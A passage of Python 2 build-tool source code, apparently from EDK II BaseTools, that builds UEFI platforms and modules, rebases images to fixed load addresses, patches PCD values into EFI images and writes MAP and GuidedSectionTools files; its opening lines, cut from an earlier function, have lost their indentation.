GuidName = re.compile("\(GUID=[-a-fA-F0-9]+")
for FvName in Wa.FdfProfile.FvDict:
FvMapBuffer = os.path.join(Wa.FvDir, FvName + '.Fv.map')
if not os.path.exists(FvMapBuffer):
continue
FvMap = open(FvMapBuffer, 'r')
#skip FV size information
FvMap.readline()
FvMap.readline()
FvMap.readline()
FvMap.readline()
for Line in FvMap:
MatchGuid = GuidPattern.match(Line)
if MatchGuid is not None:
#
# Replace GUID with module name
#
GuidString = MatchGuid.group()
if GuidString.upper() in ModuleList:
Line = Line.replace(GuidString, ModuleList[GuidString.upper()].Name)
MapBuffer.write('%s' % (Line))
#
# Add the debug image full path.
#
MatchGuid = GuidName.match(Line)
if MatchGuid is not None:
GuidString = MatchGuid.group().split("=")[1]
if GuidString.upper() in ModuleList:
MapBuffer.write('(IMAGE=%s)\n' % (os.path.join(ModuleList[GuidString.upper()].DebugDir, ModuleList[GuidString.upper()].Name + '.efi')))
FvMap.close()
## Collect MAP information of all modules
#
def _CollectModuleMapBuffer (self, MapBuffer, ModuleList):
    """Append load-module-at-fixed-address MAP info for all modules to MapBuffer.

    Modules are bucketed by phase (PEI, BOOT, RUNTIME, SMM), their image
    sizes are summed, FixAddress-related patchable PCDs are patched into
    the EFI images, and each bucket is rebased via self._RebaseModule.

    MapBuffer  - string buffer receiving the MAP text
    ModuleList - dict of upper-case GUID string -> ModuleAutoGen (built by
                 callers from non-library modules)
    """
    sys.stdout.write ("Generate Load Module At Fix Address Map")
    sys.stdout.flush()
    # EFI images that contain patchable fix-address PCDs (patched further down).
    PatchEfiImageList = []
    PeiModuleList = {}
    BtModuleList = {}
    RtModuleList = {}
    SmmModuleList = {}
    PeiSize = 0
    BtSize = 0
    RtSize = 0
    # reserve 4K size in SMRAM to make SMM module address not from 0.
    SmmSize = 0x1000
    IsIpfPlatform = False
    if 'IPF' in self.ArchList:
        IsIpfPlatform = True
    for ModuleGuid in ModuleList:
        Module = ModuleList[ModuleGuid]
        # Record the file being processed so error paths can report it.
        GlobalData.gProcessingFile = "%s [%s, %s, %s]" % (Module.MetaFile, Module.Arch, Module.ToolChain, Module.BuildTarget)

        OutputImageFile = ''
        for ResultFile in Module.CodaTargetList:
            if str(ResultFile.Target).endswith('.efi'):
                #
                # module list for PEI, DXE, RUNTIME and SMM
                #
                OutputImageFile = os.path.join(Module.OutputDir, Module.Name + '.efi')
                ImageClass = PeImageClass (OutputImageFile)
                if not ImageClass.IsValid:
                    EdkLogger.error("build", FILE_PARSE_FAILURE, ExtraData=ImageClass.ErrorInfo)
                ImageInfo = PeImageInfo(Module.Name, Module.Guid, Module.Arch, Module.OutputDir, Module.DebugDir, ImageClass)
                # Bucket the image by module type and accumulate that bucket's size.
                if Module.ModuleType in [SUP_MODULE_PEI_CORE, SUP_MODULE_PEIM, EDK_COMPONENT_TYPE_COMBINED_PEIM_DRIVER, EDK_COMPONENT_TYPE_PIC_PEIM, EDK_COMPONENT_TYPE_RELOCATABLE_PEIM, SUP_MODULE_DXE_CORE]:
                    PeiModuleList[Module.MetaFile] = ImageInfo
                    PeiSize += ImageInfo.Image.Size
                elif Module.ModuleType in [EDK_COMPONENT_TYPE_BS_DRIVER, SUP_MODULE_DXE_DRIVER, SUP_MODULE_UEFI_DRIVER]:
                    BtModuleList[Module.MetaFile] = ImageInfo
                    BtSize += ImageInfo.Image.Size
                elif Module.ModuleType in [SUP_MODULE_DXE_RUNTIME_DRIVER, EDK_COMPONENT_TYPE_RT_DRIVER, SUP_MODULE_DXE_SAL_DRIVER, EDK_COMPONENT_TYPE_SAL_RT_DRIVER]:
                    RtModuleList[Module.MetaFile] = ImageInfo
                    #IPF runtime driver needs to be at 2 page alignment.
                    # NOTE: '/' below relies on Python 2 integer division.
                    if IsIpfPlatform and ImageInfo.Image.Size % 0x2000 != 0:
                        ImageInfo.Image.Size = (ImageInfo.Image.Size / 0x2000 + 1) * 0x2000
                    RtSize += ImageInfo.Image.Size
                elif Module.ModuleType in [SUP_MODULE_SMM_CORE, SUP_MODULE_DXE_SMM_DRIVER, SUP_MODULE_MM_STANDALONE, SUP_MODULE_MM_CORE_STANDALONE]:
                    SmmModuleList[Module.MetaFile] = ImageInfo
                    SmmSize += ImageInfo.Image.Size
                    if Module.ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
                        PiSpecVersion = Module.Module.Specification.get('PI_SPECIFICATION_VERSION', '0x00000000')
                        # for PI specification < PI1.1, DXE_SMM_DRIVER also runs as BOOT time driver.
                        if int(PiSpecVersion, 16) < 0x0001000A:
                            BtModuleList[Module.MetaFile] = ImageInfo
                            BtSize += ImageInfo.Image.Size
                # Only the first .efi coda target is considered for a module.
                break
        #
        # EFI image is final target.
        # Check EFI image contains patchable FixAddress related PCDs.
        #
        if OutputImageFile != '':
            ModuleIsPatch = False
            for Pcd in Module.ModulePcdList:
                if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
                    ModuleIsPatch = True
                    break
            if not ModuleIsPatch:
                # Fall back to PCDs pulled in through linked libraries.
                for Pcd in Module.LibraryPcdList:
                    if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
                        ModuleIsPatch = True
                        break

            if not ModuleIsPatch:
                continue
            #
            # Module includes the patchable load fix address PCDs.
            # It will be fixed up later.
            #
            PatchEfiImageList.append (OutputImageFile)

    #
    # Get Top Memory address
    #
    ReservedRuntimeMemorySize = 0
    TopMemoryAddress = 0
    if self.LoadFixAddress == 0xFFFFFFFFFFFFFFFF:
        # All-ones sentinel: leave TopMemoryAddress at 0, which below makes
        # _RebaseModule treat the base values as offsets (AddrIsOffset).
        TopMemoryAddress = 0
    else:
        TopMemoryAddress = self.LoadFixAddress
        if TopMemoryAddress < RtSize + BtSize + PeiSize:
            EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is too low to load driver")
        # Make IPF runtime driver at 2 page alignment.
        if IsIpfPlatform:
            ReservedRuntimeMemorySize = TopMemoryAddress % 0x2000
            RtSize = RtSize + ReservedRuntimeMemorySize

    #
    # Patch FixAddress related PCDs into EFI image
    #
    for EfiImage in PatchEfiImageList:
        EfiImageMap = EfiImage.replace('.efi', '.map')
        if not os.path.exists(EfiImageMap):
            continue
        #
        # Get PCD offset in EFI image by GenPatchPcdTable function
        #
        PcdTable = parsePcdInfoFromMapFile(EfiImageMap, EfiImage)
        #
        # Patch real PCD value by PatchPcdValue tool
        #
        for PcdInfo in PcdTable:
            ReturnValue = 0
            # Page counts are in 4K units (Python 2 integer division).
            if PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE:
                ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE_DATA_TYPE, str (PeiSize / 0x1000))
            elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE:
                ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE_DATA_TYPE, str (BtSize / 0x1000))
            elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE:
                ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE_DATA_TYPE, str (RtSize / 0x1000))
            elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE and len (SmmModuleList) > 0:
                ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE_DATA_TYPE, str (SmmSize / 0x1000))
            if ReturnValue != 0:
                EdkLogger.error("build", PARAMETER_INVALID, "Patch PCD value failed", ExtraData=ErrorInfo)

    # Emit the per-phase page counts (4K pages) into the MAP buffer.
    MapBuffer.write('PEI_CODE_PAGE_NUMBER          = 0x%x\n' % (PeiSize / 0x1000))
    MapBuffer.write('BOOT_CODE_PAGE_NUMBER         = 0x%x\n' % (BtSize / 0x1000))
    MapBuffer.write('RUNTIME_CODE_PAGE_NUMBER      = 0x%x\n' % (RtSize / 0x1000))
    if len (SmmModuleList) > 0:
        MapBuffer.write('SMM_CODE_PAGE_NUMBER          = 0x%x\n' % (SmmSize / 0x1000))

    # Phase base addresses grow downward from the configured top address.
    PeiBaseAddr = TopMemoryAddress - RtSize - BtSize
    BtBaseAddr = TopMemoryAddress - RtSize
    RtBaseAddr = TopMemoryAddress - ReservedRuntimeMemorySize

    self._RebaseModule (MapBuffer, PeiBaseAddr, PeiModuleList, TopMemoryAddress == 0)
    self._RebaseModule (MapBuffer, BtBaseAddr, BtModuleList, TopMemoryAddress == 0)
    self._RebaseModule (MapBuffer, RtBaseAddr, RtModuleList, TopMemoryAddress == 0)
    # SMM modules start at fixed offset 0x1000 inside SMRAM (the reserved 4K).
    self._RebaseModule (MapBuffer, 0x1000, SmmModuleList, AddrIsOffset=False, ModeIsSmm=True)
    MapBuffer.write('\n\n')
    sys.stdout.write ("\n")
    sys.stdout.flush()
## Save platform Map file
#
def _SaveMapFile (self, MapBuffer, Wa):
    """Flush the accumulated address map into <BuildDir>/<PlatformName>.map."""
    #
    # Map file path is got.
    #
    TargetPath = os.path.join(Wa.BuildDir, Wa.Name + '.map')
    Content = MapBuffer.getvalue()
    MapBuffer.close()
    #
    # Save address map into MAP file (only rewritten when content changed).
    #
    SaveFileOnChange(TargetPath, Content, False)
    if self.LoadFixAddress != 0:
        sys.stdout.write ("\nLoad Module At Fix Address Map file can be found at %s\n" % (TargetPath))
        sys.stdout.flush()
## Build active platform for different build targets and different tool chains
#
def _BuildPlatform(self):
    """Build the active platform once per (build target, toolchain) pair.

    For each combination a WorkspaceAutoGen is created, every module of
    the platform is queued and built via _BuildPa, and -- for full/fds
    targets -- a load-address MAP file is produced for the platform.
    """
    SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
    for BuildTarget in self.BuildTargetList:
        GlobalData.gGlobalDefines['TARGET'] = BuildTarget
        index = 0
        for ToolChain in self.ToolChainList:
            GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
            GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
            # ToolChainFamily is parallel to ToolChainList; index tracks the pairing.
            GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
            index += 1
            Wa = WorkspaceAutoGen(
                    self.WorkspaceDir,
                    self.PlatformFile,
                    BuildTarget,
                    ToolChain,
                    self.ArchList,
                    self.BuildDatabase,
                    self.TargetTxt,
                    self.ToolDef,
                    self.Fdf,
                    self.FdList,
                    self.FvList,
                    self.CapList,
                    self.SkuId,
                    self.UniFlag,
                    self.Progress
                    )
            # The workspace may refine the FDF file and the fix-address setting.
            self.Fdf = Wa.FdfFile
            self.LoadFixAddress = Wa.Platform.LoadFixAddress
            self.BuildReport.AddPlatformReport(Wa)
            self.Progress.Stop("done!")

            # Add ffs build to makefile
            CmdListDict = {}
            if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
                CmdListDict = self._GenFfsCmd()

            for Arch in Wa.ArchList:
                GlobalData.gGlobalDefines['ARCH'] = Arch
                Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
                for Module in Pa.Platform.Modules:
                    # Get ModuleAutoGen object to generate C code file and makefile
                    Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
                    if Ma is None:
                        continue
                    self.BuildModules.append(Ma)
                self._BuildPa(self.Target, Pa, FfsCommand=CmdListDict)

            # Create MAP file when Load Fix Address is enabled.
            if self.Target in ["", "all", "fds"]:
                for Arch in Wa.ArchList:
                    GlobalData.gGlobalDefines['ARCH'] = Arch
                    #
                    # Check whether the set fix address is above 4G for 32bit image.
                    #
                    if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
                        EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
                #
                # Get Module List (non-library modules only, keyed by GUID)
                #
                ModuleList = {}
                for Pa in Wa.AutoGenObjectList:
                    for Ma in Pa.ModuleAutoGenList:
                        if Ma is None:
                            continue
                        if not Ma.IsLibrary:
                            ModuleList[Ma.Guid.upper()] = Ma

                MapBuffer = StringIO('')
                if self.LoadFixAddress != 0:
                    #
                    # Rebase module to the preferred memory address before GenFds
                    #
                    self._CollectModuleMapBuffer(MapBuffer, ModuleList)
                if self.Fdf:
                    #
                    # create FDS again for the updated EFI image
                    #
                    self._Build("fds", Wa)
                #
                # Create MAP file for all platform FVs after GenFds.
                #
                self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
                #
                # Save MAP buffer into MAP file.
                #
                self._SaveMapFile (MapBuffer, Wa)
## Build active module for different build targets, different tool chains and different archs
#
def _BuildModule(self):
    """Build the single module named by self.ModuleFile for every
    (build target, toolchain, arch) combination of the active platform.

    Returns True early for pure 'genc'/'genmake' targets; all error
    conditions are reported through EdkLogger.error.
    """
    for BuildTarget in self.BuildTargetList:
        GlobalData.gGlobalDefines['TARGET'] = BuildTarget
        index = 0
        for ToolChain in self.ToolChainList:
            WorkspaceAutoGenTime = time.time()
            GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
            GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
            GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
            index += 1
            #
            # module build needs platform build information, so get platform
            # AutoGen first
            #
            Wa = WorkspaceAutoGen(
                    self.WorkspaceDir,
                    self.PlatformFile,
                    BuildTarget,
                    ToolChain,
                    self.ArchList,
                    self.BuildDatabase,
                    self.TargetTxt,
                    self.ToolDef,
                    self.Fdf,
                    self.FdList,
                    self.FvList,
                    self.CapList,
                    self.SkuId,
                    self.UniFlag,
                    self.Progress,
                    self.ModuleFile
                    )
            self.Fdf = Wa.FdfFile
            self.LoadFixAddress = Wa.Platform.LoadFixAddress
            Wa.CreateMakeFile(False)
            # Add ffs build to makefile
            CmdListDict = None
            if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
                CmdListDict = self._GenFfsCmd()
            self.Progress.Stop("done!")
            MaList = []
            # Signals build worker threads to stop once all tasks are queued.
            ExitFlag = threading.Event()
            ExitFlag.clear()
            self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
            for Arch in Wa.ArchList:
                AutoGenStart = time.time()
                GlobalData.gGlobalDefines['ARCH'] = Arch
                Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
                for Module in Pa.Platform.Modules:
                    # Only the module named on the command line is built.
                    if self.ModuleFile.Dir == Module.Dir and self.ModuleFile.Name == Module.Name:
                        Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
                        if Ma is None: continue
                        MaList.append(Ma)
                        # Skip the build when a previous identical build is cached by hash.
                        if Ma.CanSkipbyHash():
                            self.HashSkipModules.append(Ma)
                            continue
                        # Not to auto-gen for targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
                        if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
                            # for target which must generate AutoGen code and makefile
                            if not self.SkipAutoGen or self.Target == 'genc':
                                self.Progress.Start("Generating code")
                                Ma.CreateCodeFile(True)
                                self.Progress.Stop("done!")
                            if self.Target == "genc":
                                return True
                            if not self.SkipAutoGen or self.Target == 'genmake':
                                self.Progress.Start("Generating makefile")
                                # Use the pre-generated ffs command for this (INF, arch) when present.
                                if CmdListDict and self.Fdf and (Module.File, Arch) in CmdListDict:
                                    Ma.CreateMakeFile(True, CmdListDict[Module.File, Arch])
                                    del CmdListDict[Module.File, Arch]
                                else:
                                    Ma.CreateMakeFile(True)
                                self.Progress.Stop("done!")
                            if self.Target == "genmake":
                                return True
                        self.BuildModules.append(Ma)
                self.AutoGenTime += int(round((time.time() - AutoGenStart)))
                MakeStart = time.time()
                for Ma in self.BuildModules:
                    if not Ma.IsBinaryModule:
                        Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
                    # Break build if any build thread has error
                    if BuildTask.HasError():
                        # we need a full version of makefile for platform
                        ExitFlag.set()
                        BuildTask.WaitForComplete()
                        Pa.CreateMakeFile(False)
                        EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
                    # Start task scheduler
                    if not BuildTask.IsOnGoing():
                        BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)

                # in case there's an interruption. we need a full version of makefile for platform
                Pa.CreateMakeFile(False)
                if BuildTask.HasError():
                    EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
                self.MakeTime += int(round((time.time() - MakeStart)))

            MakeContiue = time.time()
            # All tasks are queued: let the scheduler drain and finish.
            ExitFlag.set()
            BuildTask.WaitForComplete()
            self.CreateAsBuiltInf()
            self.MakeTime += int(round((time.time() - MakeContiue)))
            if BuildTask.HasError():
                EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)

            self.BuildReport.AddPlatformReport(Wa, MaList)
            # No arch produced a matching ModuleAutoGen -> the INF is not in this platform.
            if MaList == []:
                EdkLogger.error(
                            'build',
                            BUILD_ERROR,
                            "Module for [%s] is not a component of active platform."\
                            " Please make sure that the ARCH and inf file path are"\
                            " given in the same as in [%s]" % \
                                (', '.join(Wa.ArchList), self.PlatformFile),
                            ExtraData=self.ModuleFile
                            )
            # Create MAP file when Load Fix Address is enabled.
            if self.Target == "fds" and self.Fdf:
                for Arch in Wa.ArchList:
                    #
                    # Check whether the set fix address is above 4G for 32bit image.
                    #
                    if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
                        EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
                #
                # Get Module List (non-library modules only, keyed by GUID)
                #
                ModuleList = {}
                for Pa in Wa.AutoGenObjectList:
                    for Ma in Pa.ModuleAutoGenList:
                        if Ma is None:
                            continue
                        if not Ma.IsLibrary:
                            ModuleList[Ma.Guid.upper()] = Ma

                MapBuffer = StringIO('')
                if self.LoadFixAddress != 0:
                    #
                    # Rebase module to the preferred memory address before GenFds
                    #
                    self._CollectModuleMapBuffer(MapBuffer, ModuleList)
                #
                # create FDS again for the updated EFI image
                #
                GenFdsStart = time.time()
                self._Build("fds", Wa)
                self.GenFdsTime += int(round((time.time() - GenFdsStart)))
                #
                # Create MAP file for all platform FVs after GenFds.
                #
                self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
                #
                # Save MAP buffer into MAP file.
                #
                self._SaveMapFile (MapBuffer, Wa)
def _GenFfsCmd(self):
    """Invert the GenFds ffs makefile mapping.

    GenFds.GenFfsMakefile yields Cmd -> (Inf, Arch); callers want every
    command grouped by its (Inf, Arch) pair, so return
    (Inf, Arch) -> set of Cmd.
    """
    FfsCommands = GenFds.GenFfsMakefile('', GlobalData.gFdfParser, self, self.ArchList, GlobalData)
    Inverted = defaultdict(set)
    for Command, (InfFile, Arch) in FfsCommands.items():
        Inverted[InfFile, Arch].add(Command)
    return Inverted
## Build a platform in multi-thread mode
#
def _MultiThreadBuildPlatform(self):
    """Build the active platform using the multi-threaded task scheduler.

    Mirrors _BuildPlatform, but queues each module's make step as a
    BuildTask so compilation runs on self.ThreadNumber worker threads.
    """
    SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
    for BuildTarget in self.BuildTargetList:
        GlobalData.gGlobalDefines['TARGET'] = BuildTarget
        index = 0
        for ToolChain in self.ToolChainList:
            WorkspaceAutoGenTime = time.time()
            GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
            GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
            # ToolChainFamily is parallel to ToolChainList; index tracks the pairing.
            GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
            index += 1
            Wa = WorkspaceAutoGen(
                    self.WorkspaceDir,
                    self.PlatformFile,
                    BuildTarget,
                    ToolChain,
                    self.ArchList,
                    self.BuildDatabase,
                    self.TargetTxt,
                    self.ToolDef,
                    self.Fdf,
                    self.FdList,
                    self.FvList,
                    self.CapList,
                    self.SkuId,
                    self.UniFlag,
                    self.Progress
                    )
            self.Fdf = Wa.FdfFile
            self.LoadFixAddress = Wa.Platform.LoadFixAddress
            self.BuildReport.AddPlatformReport(Wa)
            Wa.CreateMakeFile(False)
            # Add ffs build to makefile
            CmdListDict = None
            if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
                CmdListDict = self._GenFfsCmd()
            # multi-thread exit flag
            ExitFlag = threading.Event()
            ExitFlag.clear()
            self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
            for Arch in Wa.ArchList:
                AutoGenStart = time.time()
                GlobalData.gGlobalDefines['ARCH'] = Arch
                Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
                if Pa is None:
                    continue
                ModuleList = []
                for Inf in Pa.Platform.Modules:
                    ModuleList.append(Inf)
                # Add the INF only list in FDF
                if GlobalData.gFdfParser is not None:
                    for InfName in GlobalData.gFdfParser.Profile.InfList:
                        Inf = PathClass(NormPath(InfName), self.WorkspaceDir, Arch)
                        if Inf in Pa.Platform.Modules:
                            continue
                        ModuleList.append(Inf)
                for Module in ModuleList:
                    # Get ModuleAutoGen object to generate C code file and makefile
                    Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
                    if Ma is None:
                        continue
                    # Skip modules whose previous build output is cached by hash.
                    if Ma.CanSkipbyHash():
                        self.HashSkipModules.append(Ma)
                        continue
                    # Not to auto-gen for targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
                    if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
                        # for target which must generate AutoGen code and makefile
                        if not self.SkipAutoGen or self.Target == 'genc':
                            Ma.CreateCodeFile(True)
                        if self.Target == "genc":
                            continue
                        if not self.SkipAutoGen or self.Target == 'genmake':
                            # Use the pre-generated ffs command for this (INF, arch) when present.
                            if CmdListDict and self.Fdf and (Module.File, Arch) in CmdListDict:
                                Ma.CreateMakeFile(True, CmdListDict[Module.File, Arch])
                                del CmdListDict[Module.File, Arch]
                            else:
                                Ma.CreateMakeFile(True)
                        if self.Target == "genmake":
                            continue
                    self.BuildModules.append(Ma)
                self.Progress.Stop("done!")
                self.AutoGenTime += int(round((time.time() - AutoGenStart)))
                MakeStart = time.time()
                for Ma in self.BuildModules:
                    # Generate build task for the module
                    if not Ma.IsBinaryModule:
                        Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
                    # Break build if any build thread has error
                    if BuildTask.HasError():
                        # we need a full version of makefile for platform
                        ExitFlag.set()
                        BuildTask.WaitForComplete()
                        Pa.CreateMakeFile(False)
                        EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
                    # Start task scheduler
                    if not BuildTask.IsOnGoing():
                        BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)

                # in case there's an interruption. we need a full version of makefile for platform
                Pa.CreateMakeFile(False)
                if BuildTask.HasError():
                    EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
                self.MakeTime += int(round((time.time() - MakeStart)))

            MakeContiue = time.time()
            #
            # Save temp tables to a TmpTableDict.
            #
            for Key in Wa.BuildDatabase._CACHE_:
                if Wa.BuildDatabase._CACHE_[Key]._RawData and Wa.BuildDatabase._CACHE_[Key]._RawData._Table and Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table:
                    if TemporaryTablePattern.match(Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table):
                        TmpTableDict[Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table] = Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Cur
            #
            #
            # All modules have been put in build tasks queue. Tell task scheduler
            # to exit if all tasks are completed
            #
            ExitFlag.set()
            BuildTask.WaitForComplete()
            self.CreateAsBuiltInf()
            self.MakeTime += int(round((time.time() - MakeContiue)))
            #
            # Check for build error, and raise exception if one
            # has been signaled.
            #
            if BuildTask.HasError():
                EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)

            # Create MAP file when Load Fix Address is enabled.
            if self.Target in ["", "all", "fds"]:
                for Arch in Wa.ArchList:
                    #
                    # Check whether the set fix address is above 4G for 32bit image.
                    #
                    if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
                        EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
                #
                # Get Module List (non-library modules only, keyed by GUID)
                #
                ModuleList = {}
                for Pa in Wa.AutoGenObjectList:
                    for Ma in Pa.ModuleAutoGenList:
                        if Ma is None:
                            continue
                        if not Ma.IsLibrary:
                            ModuleList[Ma.Guid.upper()] = Ma
                #
                # Rebase module to the preferred memory address before GenFds
                #
                MapBuffer = StringIO('')
                if self.LoadFixAddress != 0:
                    self._CollectModuleMapBuffer(MapBuffer, ModuleList)

                if self.Fdf:
                    #
                    # Generate FD image if there's a FDF file found
                    #
                    GenFdsStart = time.time()
                    LaunchCommand(Wa.GenFdsCommand, os.getcwd())
                    #
                    # Create MAP file for all platform FVs after GenFds.
                    #
                    self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
                    self.GenFdsTime += int(round((time.time() - GenFdsStart)))
                #
                # Save MAP buffer into MAP file.
                #
                self._SaveMapFile(MapBuffer, Wa)
## Generate GuidedSectionTools.txt in the FV directories.
#
def CreateGuidedSectionToolsFile(self):
    """Write GuidedSectionTools.txt (one 'guid toolName toolPath' line per
    tool) into the FV directory of every (target, toolchain) build.

    Tool entries come from *_GUID keys in the tools_def dictionary; only
    keys whose TARGET_TOOLCHAIN_ARCH prefix matches the current build are
    kept, and the matching *_PATH entry is resolved via GetFullPathOfTool.
    NOTE: uses Python-2-only constructs (dict.iteritems, print >> file).
    """
    for BuildTarget in self.BuildTargetList:
        for ToolChain in self.ToolChainList:
            Wa = WorkspaceAutoGen(
                    self.WorkspaceDir,
                    self.PlatformFile,
                    BuildTarget,
                    ToolChain,
                    self.ArchList,
                    self.BuildDatabase,
                    self.TargetTxt,
                    self.ToolDef,
                    self.Fdf,
                    self.FdList,
                    self.FvList,
                    self.CapList,
                    self.SkuId,
                    self.UniFlag
                    )
            FvDir = Wa.FvDir
            if not os.path.exists(FvDir):
                continue

            for Arch in self.ArchList:
                # Build up the list of supported architectures for this build
                prefix = '%s_%s_%s_' % (BuildTarget, ToolChain, Arch)

                # Look through the tool definitions for GUIDed tools
                guidAttribs = []
                for (attrib, value) in self.ToolDef.ToolsDefTxtDictionary.iteritems():
                    if attrib.upper().endswith('_GUID'):
                        split = attrib.split('_')
                        # Key layout: TARGET_TOOLCHAIN_ARCH_TOOLNAME_GUID
                        thisPrefix = '_'.join(split[0:3]) + '_'
                        if thisPrefix == prefix:
                            guid = self.ToolDef.ToolsDefTxtDictionary[attrib]
                            guid = guid.lower()
                            toolName = split[3]
                            # Matching *_PATH key gives the tool location.
                            path = '_'.join(split[0:4]) + '_PATH'
                            path = self.ToolDef.ToolsDefTxtDictionary[path]
                            path = self.GetFullPathOfTool(path)
                            guidAttribs.append((guid, toolName, path))

                # Write out GuidedSecTools.txt
                toolsFile = os.path.join(FvDir, 'GuidedSectionTools.txt')
                toolsFile = open(toolsFile, 'wt')
                for guidedSectionTool in guidAttribs:
                    print >> toolsFile, ' '.join(guidedSectionTool)
                toolsFile.close()
## Returns the full path of the tool.
#
def GetFullPathOfTool (self, tool):
    """Resolve *tool* to an absolute real path.

    A path that already exists as given wins; otherwise every directory
    on the PATH environment variable is probed. If nothing matches, the
    original tool name is returned unchanged.
    """
    if os.path.exists(tool):
        return os.path.realpath(tool)
    # Probe each PATH entry for the tool.
    for SearchDir in os.environ['PATH'].split(os.pathsep):
        Candidate = os.path.join(SearchDir, tool)
        if os.path.exists(Candidate):
            return os.path.realpath(Candidate)
    # Not found anywhere -- hand the input name back to the caller.
    return tool
## Launch the module or platform build
#
def Launch(self):
    """Dispatch to the module or platform build, then handle 'cleanall' teardown."""
    if self.ModuleFile:
        # A single-module build is always single-threaded.
        self.SpawnMode = False
        self._BuildModule()
    else:
        UseMultiThread = self.SpawnMode and self.Target in ["", "all"]
        if UseMultiThread:
            self._MultiThreadBuildPlatform()
        else:
            self.SpawnMode = False
            self._BuildPlatform()
        self.CreateGuidedSectionToolsFile()
    if self.Target == 'cleanall':
        # Full clean: close and remove the workspace database directory.
        self.Db.Close()
        RemoveDirectory(os.path.dirname(GlobalData.gDatabasePath), True)
